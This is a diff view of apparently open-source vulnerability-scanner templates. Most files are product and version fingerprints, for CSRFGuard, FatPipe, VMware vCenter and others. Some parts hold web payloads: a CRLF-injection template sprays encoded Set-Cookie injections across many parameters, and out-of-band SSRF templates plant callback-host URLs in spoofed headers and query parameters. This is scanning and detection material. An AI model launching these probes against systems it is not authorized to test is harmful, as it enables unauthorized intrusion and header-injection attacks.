|
||||
description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
|
||||
reference: https://github.com/OWASP/www-project-csrfguard
|
||||
tags: tech,csrfguard
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /JavaScriptServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /JavaScriptServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
OWASP-CSRFTOKEN: {{masterToken}}
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
name: "CSRFGuard-v3.x"
|
||||
words:
|
||||
- "FETCH-CSRF-TOKEN"
|
||||
|
||||
- type: word
|
||||
name: "CSRFGuard-v4.x"
|
||||
words:
|
||||
- "masterTokenValue"
|
||||
|
||||
- type: dsl
|
||||
name: "Disabled-token-per-page"
|
||||
condition: and
|
||||
dsl:
|
||||
- 'status_code_3==400'
|
||||
- 'contains(body, "Token-Per-Page functionality is disabled")'
|
||||
|
||||
- type: dsl
|
||||
name: "Enabled-token-per-page"
|
||||
condition: and
|
||||
dsl:
|
||||
- 'status_code_3==200'
|
||||
- 'contains(body, "{\"pageTokens")'
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: regex
|
||||
name: masterToken
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
name: "master-token"
|
||||
regex:
|
||||
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
|
||||
|
||||
- type: json
|
||||
name: "page-token"
|
||||
json:
|
||||
- '.pageTokens'
|
|
@ -0,0 +1,31 @@
|
|||
id: fatpipe-mpvpn-detect
|
||||
|
||||
info:
|
||||
name: FatPipe MPVPN Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
tags: tech,fatpipe
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fpui/jsp/login.jsp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>FatPipe MPVPN | Log in</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<h5>([0-9.a-z]+)<\/h5>'
|
|
@ -0,0 +1,31 @@
|
|||
id: fatpipe-warp-detect
|
||||
|
||||
info:
|
||||
name: FatPipe WARP Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
tags: tech,fatpipe
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fpui/jsp/login.jsp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>FatPipe WARP | Log in</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<h5>([0-9.a-z]+)<\/h5>'
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,24 @@
|
|||
id: hp-media-vault-detect
|
||||
info:
|
||||
name: HP Media Vault Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
metadata:
|
||||
fofa-dork: 'app="HP-Media-Vault-Media-Server"'
|
||||
tags: tech,hp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>HP Media Vault"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,63 @@
|
|||
id: vmware-version-detect
|
||||
|
||||
info:
|
||||
name: vmware-version-detect
|
||||
author: elouhi
|
||||
severity: info
|
||||
description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information
|
||||
reference:
|
||||
- https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/
|
||||
- https://svn.nmap.org/nmap/scripts/vmware-version.nse
|
||||
tags: tech,vcenter,vmware
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /sdk/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
|
||||
<soap:Header>
|
||||
<operationID>00000001-00000001</operationID>
|
||||
</soap:Header>
|
||||
<soap:Body>
|
||||
<RetrieveServiceContent xmlns="urn:internalvim25">
|
||||
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
|
||||
</RetrieveServiceContent>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ha-folder-root'
|
||||
- 'RetrieveServiceContentResponse'
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
part: header
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "<name>(.*?)</name>"
|
||||
- "<version>(.*?)</version>"
|
||||
- "<build>(.*?)</build>"
|
||||
- "<osType>(.*?)</osType>"
|
||||
- "<productLineId>(.*?)</productLineId>"
|
||||
- "<apiType>(.*?)</apiType>"
|
|
@ -0,0 +1,23 @@
|
|||
id: yzmcms-detect
|
||||
|
||||
info:
|
||||
name: YzmCMS Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
tags: yzmcms,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin/index/login.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Powered By <a href="http://www.yzmcms.com"'
|
|
@ -16,7 +16,6 @@ requests:
|
|||
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
|
||||
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
|
||||
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: oob-header-based-interaction
|
||||
|
||||
info:
|
||||
name: Header Based Generic OOB Interaction
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request headers.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}}
|
||||
Referer: http://{{interactsh-url}}/ref
|
||||
Cf-Connecting_ip: spoofed.{{interactsh-url}}
|
||||
X-Real-Ip: spoofed.{{interactsh-url}}
|
||||
From: root@{{interactsh-url}}
|
||||
True-Client-Ip: spoofed.{{interactsh-url}}
|
||||
Client-Ip: spoofed.{{interactsh-url}}
|
||||
Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}}
|
||||
X-Client-Ip: spoofed.{{interactsh-url}}
|
||||
X-Originating-Ip: spoofed.{{interactsh-url}}
|
||||
X-Wap-Profile: http://{{interactsh-url}}/wap.xml
|
||||
X-Forwarded-For: spoofed.{{interactsh-url}}
|
||||
Contact: root@{{interactsh-url}}
|
||||
X-Forwarded-Host: spoofed.{{interactsh-url}}
|
||||
X-Host: spoofed.{{interactsh-url}}
|
||||
X-Forwarded-Server: spoofed.{{interactsh-url}}
|
||||
X-HTTP-Host-Override: spoofed.{{interactsh-url}}
|
||||
Cache-Control: no-transform
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: dns
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,21 @@
|
|||
id: oob-param-based-interaction
|
||||
|
||||
info:
|
||||
name: Parameter Based Generic OOB Interaction
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request parameters.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue